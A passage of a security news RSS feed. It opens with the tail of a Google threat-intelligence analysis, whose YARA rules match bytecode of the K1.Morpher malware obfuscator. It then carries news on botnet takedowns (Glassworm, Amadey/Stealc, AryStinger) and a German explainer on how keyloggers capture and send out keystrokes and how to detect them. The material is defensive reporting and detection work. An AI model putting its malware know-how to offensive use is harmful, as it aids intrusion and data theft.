      06 // ldloc.9
      7E ??????04 // ldsfld &lt;token&gt;
      5A // mul
      0A // stloc.0
      06 // ldloc.0
      06 // ldloc.0
      1E // ldc.i4.8
      64 // shr.un
      61 // xor
      0A // stloc.0
      06 // ldloc.0
      0B // stloc.1
      2B 00 // br.s 40
      07 // ldloc.1
      2A // ret
    }

  condition:
    dotnet.is_dotnet
    and all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Hunting_K1MORPHER_3 {
  meta:
    author = "Google Threat Intelligence Group"
    description = "Detects the Squirrel3 RNG implemented within K1.Morpher"
    hash = "391e51354118fb87dc57650cbbd94258c3f7c0a0d6868040b7a473ad626ff25e"

  strings:
    $squirrel3_code_1 = {
      03 // ldarg.1
      7E??????04 // ldsfld &lt;token&gt;
      5A // mul
      02 // ldarg.0
      58 // add
      25 // dup
      1E // ldc.i4.8
      64 // shr.un
      61 // xor
      7E??????04 // ldsfld &lt;token&gt;
      58 // add
      25 // dup
      1E // ldc.i4.8
      62 // shl
      61 // xor
      7E??????04 // ldsfld &lt;token&gt;
      5A // mul
      25 // dup
      1E // ldc.i4.8
      64 // shr.un
      61 // xor
      2A // ret
    }

  condition:
    dotnet.is_dotnet
    and all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><h3><span>Acknowledgements</span></h3>
<p><span>This analysis would not have been possible without the assistance of Gabby Roncone for technical review. We also appreciate GitHub for their collaboration against this threat. </span></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Examining the Glassworm Takeover with Tillmann "Bot Slayer" Werner]]></title>
<description><![CDATA[Author: CrowdStrike - Bewertung: 0x - Views:4 He’s back, and he’s ready to talk botnet takeovers.

Tillmann Werner, VP of Intelligence Production at CrowdStrike, returns to the podcast to discuss CrowdStrike’s coordinated takeover of the Glassworm botnet. Glassworm was a global threat targeting s...]]></description>
<link>https://tsecurity.de/de/3624263/it-security-video/examining-the-glassworm-takeover-with-tillmann-bot-slayer-werner/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624263/it-security-video/examining-the-glassworm-takeover-with-tillmann-bot-slayer-werner/</guid>
<pubDate>Thu, 25 Jun 2026 13:18:42 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: CrowdStrike - Bewertung: 0x - Views:4 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/gUQOSmIOxac?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>He’s back, and he’s ready to talk botnet takeovers.<br />
<br />
Tillmann Werner, VP of Intelligence Production at CrowdStrike, returns to the podcast to discuss CrowdStrike’s coordinated takeover of the Glassworm botnet. Glassworm was a global threat targeting software developers through the open-source supply chain. This infection vector stood out — open-source ecosystems are based on trust, and adversaries are learning they can reach a vast pool of victims by compromising the supply chain. Some open-source libraries get 100 million downloads per week.<br />
<br />
Glassworm was described as an “unkillable” botnet. Resilience was built into its design, which relied on four different command-and-control channels. This made the takeover complicated because a botnet can’t be taken over until all command-and-control mechanisms are suppressed.<br />
<br />
“Once it’s down, you gotta make sure it’s down,” said Adam, who calls Tillmann the “bot slayer.”<br />
<br />
In this episode, they get into the details: what Glassworm was after, how its unknown operators strengthened its infrastructure, and the planning and execution behind the takeover. Tillmann and his team facilitated the process by conducting extensive technical analysis, understanding Glassworm’s evolution, and spotting the opportunity to disrupt it. They worked with partners across the private and public sectors, as well as internally at CrowdStrike, to do it safely and avoid disrupting critical systems.<br />
<br />
Come for the behind-the-scenes details, and stay for the debate around baking the perfect pizza in this episode of the Adversary Universe podcast.<br />
<br />
Learn more in our blog: https://cs.link/uqUHf<br />
<br />
🔗 Links:<br />
<br />
🎧 Spotify: https://cs.link/uissX<br />
🎧 Apple Podcasts: https://cs.link/uissY<br />
🎧 Our site: https://cs.link/uissZ<br />
<br />
📣 Connect With Us:<br />
<br />
► X:<br />
https://twitter.com/CrowdStrike<br />
► Instagram:<br />
https://www.instagram.com/crowdstrike<br />
► LinkedIn:<br />
https://www.linkedin.com/company/crowdstrike<br />
<br />
🔔 Subscribe to stay updated!<br />
<br />
#CrowdStrike #AdversaryPodcast #Glassworm<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ESET takes part in Operation Endgame to disrupt Amadey and Stealc]]></title>
<description><![CDATA[ESET researchers assisted in the global disruption of the Amadey botnet and Stealc infostealer, providing technical analysis, infrastructure tracking, and affiliate-level insights This article has been indexed from WeLiveSecurity Read the original article: ESET takes part in Operation Endgame to…...]]></description>
<link>https://tsecurity.de/de/3623213/it-security-nachrichten/eset-takes-part-in-operation-endgame-to-disrupt-amadey-and-stealc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623213/it-security-nachrichten/eset-takes-part-in-operation-endgame-to-disrupt-amadey-and-stealc/</guid>
<pubDate>Thu, 25 Jun 2026 04:08:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>ESET researchers assisted in the global disruption of the Amadey botnet and Stealc infostealer, providing technical analysis, infrastructure tracking, and affiliate-level insights This article has been indexed from WeLiveSecurity Read the original article: ESET takes part in Operation Endgame to…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/eset-takes-part-in-operation-endgame-to-disrupt-amadey-and-stealc/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/eset-takes-part-in-operation-endgame-to-disrupt-amadey-and-stealc/">ESET takes part in Operation Endgame to disrupt Amadey and Stealc</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ESET takes part in Operation Endgame to disrupt Amadey and Stealc]]></title>
<description><![CDATA[ESET researchers assisted in the global disruption of the Amadey botnet and Stealc infostealer, providing technical analysis, infrastructure tracking, and affiliate-level insights]]></description>
<link>https://tsecurity.de/de/3623167/it-security-nachrichten/eset-takes-part-in-operation-endgame-to-disrupt-amadey-and-stealc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623167/it-security-nachrichten/eset-takes-part-in-operation-endgame-to-disrupt-amadey-and-stealc/</guid>
<pubDate>Thu, 25 Jun 2026 03:37:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ESET researchers assisted in the global disruption of the Amadey botnet and Stealc infostealer, providing technical analysis, infrastructure tracking, and affiliate-level insights]]></content:encoded>
</item>
<item>
<title><![CDATA[Was ist ein Keylogger?]]></title>
<description><![CDATA[Keylogger sind Malware der alten Schule. Lesen Sie, wie die Tools zur Tastaturüberwachung funktionieren und warum sie nicht nur etwas für Cyberkriminelle sind.
IM_photo | shutterstock.com



Auch wenn Keylogger schon etliche Jahre auf dem Buckel haben: Sie sind immer noch beliebt und werden häufi...]]></description>
<link>https://tsecurity.de/de/3617156/it-security-nachrichten/was-ist-ein-keylogger/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3617156/it-security-nachrichten/was-ist-ein-keylogger/</guid>
<pubDate>Tue, 23 Jun 2026 06:05:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2024/11/Keylogger_IM_photo-shutterstock_16z9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Hands Keyboard Tastatur Unschaerfe 16z9" class="wp-image-3610305" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Keylogger sind Malware der alten Schule. Lesen Sie, wie die Tools zur Tastaturüberwachung funktionieren und warum sie nicht nur etwas für Cyberkriminelle sind.</p>
</figcaption></figure><p class="imageCredit">IM_photo | shutterstock.com</p></div>



<p>Auch wenn Keylogger schon etliche Jahre auf dem Buckel haben: Sie sind immer noch beliebt und werden häufig im Rahmen <a href="https://www.csoonline.com/article/3577944/diese-unternehmen-hats-schon-erwischt.html" title="großangelegter Cyberangriffe" target="_blank">großangelegter Cyberangriffe</a> eingesetzt.</p>



<h2 class="wp-block-heading">Keylogger – Definition</h2>



<p>Der Begriff <a href="https://de.wikipedia.org/wiki/Keylogger" title="Keylogger" target="_blank" rel="noopener">Keylogger</a> bezeichnet eine Art von Überwachungssoftware, die die Tastatureingaben eines Benutzers aufzeichnet. Die Schadsoftware sendet die Daten, die beim Keylogging erfasst werden, an einen Dritten.</p>



<p>Cyberkriminelle nutzen Keylogger, um an persönliche Daten oder sensible Finanzinformationen zu gelangen, die sie dann verkaufen oder anderweitig gewinnbringend nutzen können. Es gibt jedoch auch legitime Verwendungszwecke für Keylogger in Unternehmen – zum Beispiel beim Troubleshooting, dem Optimieren der Benutzerfreundlichkeit oder <a href="https://www.computerwoche.de/article/2798126/welche-kontrollen-die-dsgvo-erlaubt.html" title="um Mitarbeiter legal zu überwachen" target="_blank">um Mitarbeiter legal zu überwachen</a> (je nachdem, welchen Gesetzen sie dabei unterliegen). Darüber hinaus nutzen Strafverfolgungsbehörden und Geheimdienste Keylogging zu Überwachungszwecken. Mehr dazu lesen Sie im Absatz “Einsatzzwecke”.</p>



<h2 class="wp-block-heading">Keylogger – Funktionsweise</h2>



<p>“Keylogger sind Programme, die Algorithmen nutzen, um die Tastaturanschläge durch Mustererkennung und andere Techniken zu überwachen”, erklärt Tom Bain, Vice President Security Strategy bei Morphisec. Der Umfang der von der Keylogger-Software gesammelten Informationen kann dabei variieren: Einfache Formen erfassen nur die Informationen, die auf einer (einzigen) Website oder in einer Anwendung eingegeben werden. Hochentwickelte Keylogging-Programme zeichnen hingegen alles auf (einschließlich der Daten, die bei Copy-Paste-Aktionen anfallen), unabhängig von der Anwendung. Einige Keylogger-Varianten – insbesondere solche, die auf mobile Geräte abzielen – gehen noch weiter und erfassen auch Anrufe (sowohl Anrufverlauf als auch Audio), Informationen aus Messaging-Anwendungen, GPS-Standorte, Screenshots und sogar Mikrofon- und Kameraaufnahmen.</p>



<p>Keylogger können hardware- oder softwarebasiert aufgebaut sein:</p>



<ul class="wp-block-list">
<li><p>Hardwarebasierte Keylogger werden einfach zwischen Tastatur und Computer geschaltet.</p></li>



<li><p>Bei softwarebasierten Keyloggern kann es sich um Applikationen oder Tools handeln, die legal oder illegal installiert werden, in letzterem Fall also das Gerät unwissentlich mit <a title="Malware " href="https://www.computerwoche.de/article/2800283/das-kleine-abc-der-schadsoftware.html" target="_blank">Malware </a>infizieren.</p></li>
</ul>



<p>Die beim Keylogging erfassten Daten werden von der Software per E-Mail oder durch den Upload von Protokolldaten in vordefinierte Websites, Datenbanken oder FTP-Server an den Angreifer zurückgesendet. Ist der Keylogger Instument in einem großen Cyberangriff, ist es sehr wahrscheinlich, dass die Kriminellen sich <a href="https://www.computerwoche.de/article/2798116/was-sie-ueber-rdp-hijacking-wissen-sollten.html" title="per Fernzugriff einloggen können" target="_blank">per Fernzugriff einloggen können</a>, um die Tastaturanschlagsdaten herunterzuladen.</p>



<h2 class="wp-block-heading">Keylogger – Einsatzzwecke</h2>



<p>Die ersten Keylogger wurden bereits in den 1970er Jahren <a href="https://www.cryptomuseum.com/covert/bugs/selectric/index.htm" title="vom sowjetischen Geheimdienst eingesetzt" target="_blank" rel="noopener">vom sowjetischen Geheimdienst eingesetzt</a> (mehr dazu später). Auch diese frühen Keylogger zeichneten auf, was getippt wurde und schickten die Informationen über Funksignale an den KGB zurück.</p>



<p><strong>Wie Cyberkriminelle Keylogger einsetzen</strong></p>



<p>Heute gehören Keylogger zum gängigen Instrumentarium Cyberkrimineller, um finanzielle Informationen wie Bank- und Kreditkartendaten, persönliche Informationen wie E-Mail-Adressen, Passwörter oder sensible Geschäftsinformationen über Prozesse und <a href="https://www.computerwoche.de/article/2764516/schuetzen-sie-ihr-geistiges-eigentum-richtig.html" title="geistiges Eigentum" target="_blank">geistiges Eigentum</a> zu entwenden. Je nach Art der gesammelten Daten (und den Motiven der Angreifer) werden die Informationen <a href="https://www.computerwoche.de/article/2761784/werden-ihre-daten-im-darknet-gehandelt.html" title="auf Darknet-Marktplätzen feilgeboten" target="_blank">auf Darknet-Marktplätzen feilgeboten</a> oder im Rahmen eines größeren Angriffs wiederverwendet.</p>



<p>“Wenn ein Keylogger in der Lage ist, die Tastenanschläge eines Datenbankadministrators in einem großen Unternehmen aufzuzeichnen, eröffnet das dem Angreifer Zugang zu Endpunkten und Servern, die wiederum viele sensible Informationen preisgeben können, die sich <a href="https://www.computerwoche.de/article/2803996/ransomware-erpresser-drohen-mit-daten-outing.html" title="zu Geld machen lassen" target="_blank">zu Geld machen lassen</a>“, erklärt Security-Spezialist Bain.</p>



<p><strong>Keylogger am Arbeitsplatz</strong></p>



<p>Es gibt auch einen großen Markt für legale Keylogging-Apps, wenngleich diese meist ethisch fragwürdig sind. Sie können etwa genutzt werden, um Familienmitglieder, Partner oder Arbeitnehmer auszuspionieren. Wenn der Benutzer eines Geräts davon weiß, dass <a title="Spyware" href="https://www.computerwoche.de/article/2778570/diese-gefahren-bedrohen-ihren-pc.html" target="_blank">Spyware</a> auf seinem Gerät läuft, ist das in vielen Ländern legal. Anwendungen, die Informationen über das Arbeitsverhalten sammeln, sind allerdings nicht nur aus moralischen, sondern auch aus Sicherheitsgründen mit Vorsicht zu genießen. Der Spyware-Anbieter mSpy wurde beispielsweise überführt, in mehreren Fällen unabsichtlich Millionen Datensätze von Opfern einer Ausspähung veröffentlicht zu haben.</p>



<p>Überwachungssoftware dieser Art, die manchmal auch als “<a href="https://www.proofpoint.com/us/blog/insider-threat-management/what-advanced-corporate-keylogging-definition-benefits-and-uses" title="Corporate Keylogging" target="_blank" rel="noopener">Corporate Keylogging</a>” bezeichnet wird, kann indes für Testing, Debugging und die Verbesserung der User Experience nützlich sein. “In einer seriösen Umgebung werden Keylogger beispielsweise eingesetzt, um zu überprüfen, ob IT-Sicherheits- und Compliance-Vorschriften eingehalten werden”, weiß Simon Sharp, International Vice President beim Sicherheitsanbieter ObserveIT. “Ein Administrator kann dann sofort feststellen, wer ein bestimmtes Wort oder einen bestimmten Wert eingegeben hat, der mit einem Sicherheitsvorfall in Verbindung steht. So kann er verstehen, wer wann und warum gegen eine Richtlinie verstoßen hat.”</p>



<p>Die IT-Abteilung kann die Tastaturanschlagsdaten nutzen, um Benutzerprobleme zu identifizieren und zu beheben. Darüber hinaus können die Keylogging-Daten möglicherweise zusätzliche <a href="https://www.computerwoche.de/article/2784085/so-fuehren-sie-it-forensik-in-der-praxis-ein.html" title="forensische Informationen" target="_blank">forensische Informationen</a> nach einem Sicherheitsvorfall bereitstellen. Keylogger können auch dazu genutzt werden, potenzielle Innentäter zu erkennen, die Produktivität der Mitarbeiter zu überwachen oder um sicherzustellen, dass die IT-Ressourcen des Unternehmens nur für berufliche Zwecke genutzt werden. Sämtliche erfassten Keylogging-Daten sollten <a href="https://www.computerwoche.de/article/2650080/faq-was-sie-ueber-verschluesselung-wissen-sollten.html" title="verschlüsselt werden" target="_blank">verschlüsselt werden</a>.</p>



<h2 class="wp-block-heading">Keylogger – Infektionswege</h2>



<p>Es gibt verschiedene Wege, wie Keylogger auf einem Zielsystem platziert werden können. Hardwarebasierte Keylogger erfordern eine physische Handlung des Angreifers vor Ort. Das ist meist schwierig zu bewerkstelligen – aber nicht unmöglich. Auch drahtlose Tastaturen können übrigens <a href="https://keysniffer.net/" title="aus der Ferne ausspioniert werden" target="_blank" rel="noopener">aus der Ferne ausspioniert werden</a>. </p>



<p>Software-basierte Keylogger sind weiter verbreitet und eröffnen mehrere Zugangswege:</p>



<ul class="wp-block-list">
<li><p>Infizierte <a title="Domains" href="https://www.computerwoche.de/article/2802729/was-ist-das-domain-name-system.html" target="_blank">Domains</a> sind eine gängige Angriffsmethode – im Oktober 2018 wurden die .com- und .eu-Domains der Online-Bürosoftware Zoho gesperrt, nachdem sie Keylogging-Malware an Nutzer ausgeliefert hatten. Auch Tausende von WordPress-Webseiten wurden bereits über gefälschte Google-Analytics-Skripte mit Keyloggern infiziert.</p></li>



<li><p>Mit Malware infizierte Apps sind ebenfalls ein Problem. Der Google Play Store hatte in der Vergangenheit bereits des öfteren mit Apps zu kämpfen, die Keylogger enthielten.</p></li>



<li><p>Wie viele andere Arten von Malware sind auch Keylogger oft in Phishing-E-Mails eingebettet. Eine Version des HawkEye-Keyloggers wurde beispielsweise über eine E-Mail-Kampagne mit infizierten Word-Dokumenten verbreitet.</p></li>



<li><p>Einige andere Keylogger-Varianten, wie etwa Fauxspersky, können sich über infizierte USB-Laufwerke verbreiten.</p></li>
</ul>



<p>“Die größte Innovation bei Keyloggern sind integrierte Ausweichtechniken, die es ermöglichen, die Malware an Erkennungsmechanismen wie Antivirus-Software vorbeizuschleusen”, sagt Bain. Viele Keylogger würden inzwischen in Kombination mit <a href="https://www.computerwoche.de/article/2794933/was-sie-ueber-erpressersoftware-wissen-muessen.html" title="Ransomware" target="_blank">Ransomware</a>, <a href="https://www.computerwoche.de/article/2770992/cryptomining-wider-willen.html" title="Cryptominer Malware" target="_blank">Cryptominer Malware</a> oder <a href="https://www.computerwoche.de/article/2790249/so-funktionieren-mirai-reaper-echobot-und-co.html" title="Botnet-Code" target="_blank">Botnet-Code</a> geliefert, so der Experte.</p>



<h2 class="wp-block-heading">6 Wege, um Keylogger zu erkennen und entfernen</h2>



<p>Die folgenden Ratschläge stellen die nach allgemeiner Auffassung wirksamsten Schritte dar, um die Auswirkungen unerwünschter Keylogger zu minimieren:</p>



<p><strong>1. Ressourcen, Prozesse und Daten überwachen</strong></p>



<p>Um einen Keylogger zu finden, kann es hilfreich sein, einen Blick auf die Ressourcenzuweisung, die Hintergrundprozesse und die Daten zu werfen, die vom betreffenden Gerät übertragen werden. Um zu funktionieren, benötigen Keylogger in der Regel <a href="https://www.computerwoche.de/article/2763049/so-umgehen-sie-root-sperren.html" title="Root-Zugriff" target="_blank">Root-Zugriff</a> auf den Zielrechner – ebenfalls ein verräterisches Anzeichen für eine Keylogger-Infektion.</p>



<p><strong>2. Schutz aktualisieren</strong></p>



<p>Da Keylogger oft mit anderen Formen von Malware gebündelt werden, kann die Entdeckung von Keylogger-Malware ein Hinweis auf einen umfassenderen Angriff sein. Aktuelle Virenschutz- und Anti-Rootkit-Lösungen entfernen bekannte Keylogger-Malware. Dennoch empfehlen sich weitere Untersuchungen, um festzustellen, ob der Vorfall Teil eines größeren Angriffs war.</p>



<p><strong>3. Anti-Keylogger-Software einsetzen</strong></p>



<p>Spezielle Anti-Keylogger-Software verschlüsselt Tastaturanschläge, sucht nach bekannten Keyloggern und entfernt sie. Bei ungewöhnlichem Keylogger-ähnlichem Verhalten schlägt sie Alarm. Hilfreich ist es auch, den Root-Zugriff für nicht autorisierte Anwendungen zu sperren und bekannte Spyware in die IT-Blacklist aufzunehmen.</p>



<p><strong>4. Virtuelle Tastaturen nutzen</strong></p>



<p>Virtuelle Onscreen-Keyboards vermindern das Keylogger-Risiko, weil sie Informationen auf andere Weise weitergeben als physische Tastaturen. Das kann sich allerdings auf die Produktivität der Benutzer auswirken. Außerdem wirkt es nicht gegen alle Arten von Keylogger und beseitigt auch nicht die Ursache des Problems.</p>



<p><strong>5. Selbstausführende Dateien deaktivieren</strong></p>



<p>Indem selbstausführende Dateien auf extern angeschlossenen Geräten wie etwa USB-Devices deaktiviert werden und Dateien lediglich eingeschränkt auf und von externen Rechnern kopiert werden können, lässt sich das Risiko einer Keylogger-Infektion ebenfalls verringern.</p>



<p><strong>6. Strikte Richtlinien durchsetzen</strong></p>



<p>Der beste Weg für Unternehmen, sich vor Keylogger-Malware zu schützen, besteht in vielschichtigen Kennwortrichtlinien und einer Mehr-Faktor-Authentifizierung für alle Unternehmenskonten und -geräte. Auch im Fall von Keylogging reicht durchschnittliche Antivirus-Technologie nicht mehr aus.</p>



<h2 class="wp-block-heading">Keylogger-Historie – berühmte Beispiele</h2>



<ul class="wp-block-list">
<li><p>Der älteste bekannte Keylogger entstammt dem Prä-Computerzeitalter: Der sowjetische Geheimdienst entwickelte in den 1970er Jahren ein Device, das in elektrischen IBM-Schreibmaschinen versteckt werden konnte und Informationen über Tastenanschläge per Funk übermittelte. Diese frühen Keylogger wurden in US-Botschaften in Moskau und Leningrad eingesetzt. </p></li>



<li><p>Der erste Computer-Keylogger wurde 1983 vom damaligen Doktoranden <a title="Perry Kivolowitz" href="https://twitter.com/PerryKivolowitz" target="_blank" rel="noopener">Perry Kivolowitz</a> als Proof of Concept entwickelt. </p></li>



<li><p>Ein besonders bemerkenswertes Beispiel für einen Keylogger “in freier Wildbahn” wurde 2015 “im Bundle” mit einer Modifikation für das Videospiel Grand Theft Auto V <a title="verbreitet" href="https://uk.pcmag.com/games/41973/some-gta-v-modders-hit-with-keylogger" target="_blank" rel="noopener">verbreitet</a>. </p></li>



<li><p>Im Jahr 2017 wurde bekannt, dass Hunderte von Laptop-Modellen aus dem Hause Hewlett-Packard mit einem Keylogger <a title="ausgeliefert wurden" href="https://www.csoonline.com/article/3241237/keylogger-found-in-keyboard-driver-of-475-hp-notebook-models.html" target="_blank">ausgeliefert wurden</a>. Das Unternehmen bestand allerdings darauf, dass es sich um ein Tool zur Diagnose der Tastaturleistung handelte, das vor der Auslieferung hätte gelöscht werden müssen.</p></li>
</ul>



<p><strong>Dieser Artikel ist <a href="https://www.csoonline.com/article/566645/keyloggers-explained-how-attackers-record-computer-inputs.html" target="_blank">im Original</a> bei unserer Schwesterpublikation CSOonline.com erschienen.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AryStinger Botnet Hijacks 4,300+ Routers to Build Global Attack Proxy Network]]></title>
<description><![CDATA[A newly discovered botnet called AryStinger has quietly hijacked more than 4,300 routers across the globe, turning them into a silent army of attack proxies. The threat actors behind this campaign are exploiting decade-old vulnerabilities to build a covert reconnaissance…
Read more →
The post Ary...]]></description>
<link>https://tsecurity.de/de/3616711/it-security-nachrichten/arystinger-botnet-hijacks-4300-routers-to-build-global-attack-proxy-network/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616711/it-security-nachrichten/arystinger-botnet-hijacks-4300-routers-to-build-global-attack-proxy-network/</guid>
<pubDate>Mon, 22 Jun 2026 23:35:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly discovered botnet called AryStinger has quietly hijacked more than 4,300 routers across the globe, turning them into a silent army of attack proxies. The threat actors behind this campaign are exploiting decade-old vulnerabilities to build a covert reconnaissance…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/arystinger-botnet-hijacks-4300-routers-to-build-global-attack-proxy-network/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/arystinger-botnet-hijacks-4300-routers-to-build-global-attack-proxy-network/">AryStinger Botnet Hijacks 4,300+ Routers to Build Global Attack Proxy Network</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AryStinger Botnet Hijacks 4,300+ Routers to Build Global Attack Proxy Network]]></title>
<description><![CDATA[A newly discovered botnet called AryStinger has quietly hijacked more than 4,300 routers across the globe, turning them into a silent army of attack proxies. The threat actors behind this campaign are exploiting decade-old vulnerabilities to build a covert reconnaissance infrastructure, and what ...]]></description>
<link>https://tsecurity.de/de/3616502/it-security-nachrichten/arystinger-botnet-hijacks-4300-routers-to-build-global-attack-proxy-network/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616502/it-security-nachrichten/arystinger-botnet-hijacks-4300-routers-to-build-global-attack-proxy-network/</guid>
<pubDate>Mon, 22 Jun 2026 21:53:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly discovered botnet called AryStinger has quietly hijacked more than 4,300 routers across the globe, turning them into a silent army of attack proxies. The threat actors behind this campaign are exploiting decade-old vulnerabilities to build a covert reconnaissance infrastructure, and what makes it particularly alarming is how well it manages to stay hidden […]</p>
<p>The post <a href="https://cybersecuritynews.com/arystinger-botnet-hijacks-4300-routers/">AryStinger Botnet Hijacks 4,300+ Routers to Build Global Attack Proxy Network</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thousands of D-Link routers under control of AryStinger botnet]]></title>
<description><![CDATA[Thousands of outdated D-Link routers have been absorbed into the AryStinger botnet, with no future security updates available to protect them. This article has been indexed from Malwarebytes Read the original article: Thousands of D-Link routers under control of AryStinger…
Read more →
The post T...]]></description>
<link>https://tsecurity.de/de/3616044/it-security-nachrichten/thousands-of-d-link-routers-under-control-of-arystinger-botnet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616044/it-security-nachrichten/thousands-of-d-link-routers-under-control-of-arystinger-botnet/</guid>
<pubDate>Mon, 22 Jun 2026 18:08:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Thousands of outdated D-Link routers have been absorbed into the AryStinger botnet, with no future security updates available to protect them. This article has been indexed from Malwarebytes Read the original article: Thousands of D-Link routers under control of AryStinger…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/thousands-of-d-link-routers-under-control-of-arystinger-botnet/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/thousands-of-d-link-routers-under-control-of-arystinger-botnet/">Thousands of D-Link routers under control of AryStinger botnet</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thousands of D-Link routers under control of AryStinger botnet]]></title>
<description><![CDATA[Thousands of outdated D-Link routers have been absorbed into the AryStinger botnet, with no future security updates available to protect them.]]></description>
<link>https://tsecurity.de/de/3615986/it-security-nachrichten/thousands-of-d-link-routers-under-control-of-arystinger-botnet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615986/it-security-nachrichten/thousands-of-d-link-routers-under-control-of-arystinger-botnet/</guid>
<pubDate>Mon, 22 Jun 2026 17:39:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Thousands of outdated D-Link routers have been absorbed into the AryStinger botnet, with no future security updates available to protect them.]]></content:encoded>
</item>
<item>
<title><![CDATA[AryStinger Malware Botnet Hijacks Over 4,000 Outdated Routers for Cyberattacks]]></title>
<description><![CDATA[  AryStinger, a fresh malware botnet, has breached over four thousand aging routers across the globe. Devices caught in its grip now serve as launchpads for online attacks, quietly repurposed without user knowledge. Detected by analysts at Qianxin’s XLab division,…
Read more →
The post AryStinger...]]></description>
<link>https://tsecurity.de/de/3615938/it-security-nachrichten/arystinger-malware-botnet-hijacks-over-4000-outdated-routers-for-cyberattacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615938/it-security-nachrichten/arystinger-malware-botnet-hijacks-over-4000-outdated-routers-for-cyberattacks/</guid>
<pubDate>Mon, 22 Jun 2026 17:25:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>  AryStinger, a fresh malware botnet, has breached over four thousand aging routers across the globe. Devices caught in its grip now serve as launchpads for online attacks, quietly repurposed without user knowledge. Detected by analysts at Qianxin’s XLab division,…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/arystinger-malware-botnet-hijacks-over-4000-outdated-routers-for-cyberattacks/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/arystinger-malware-botnet-hijacks-over-4000-outdated-routers-for-cyberattacks/">AryStinger Malware Botnet Hijacks Over 4,000 Outdated Routers for Cyberattacks</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kommerzielle Cyber-Contractor in China: Botnets, Datenhandel und Composite Responsibility]]></title>
<description><![CDATA[Peking / LONDON (IT BOLTWISE) – Chinesische Cyberoperationen funktionieren zunehmend als kommerzielles Ökosystem: Private Firmen liefern Malware, Botnet-Zugänge und gestohlene Daten an staatliche Auftraggeber. Neue Analysen sprechen dabei von „composite responsibility“, weil eine Kampagne nicht m...]]></description>
<link>https://tsecurity.de/de/3615820/it-security-nachrichten/kommerzielle-cyber-contractor-in-china-botnets-datenhandel-und-composite-responsibility/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615820/it-security-nachrichten/kommerzielle-cyber-contractor-in-china-botnets-datenhandel-und-composite-responsibility/</guid>
<pubDate>Mon, 22 Jun 2026 16:54:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
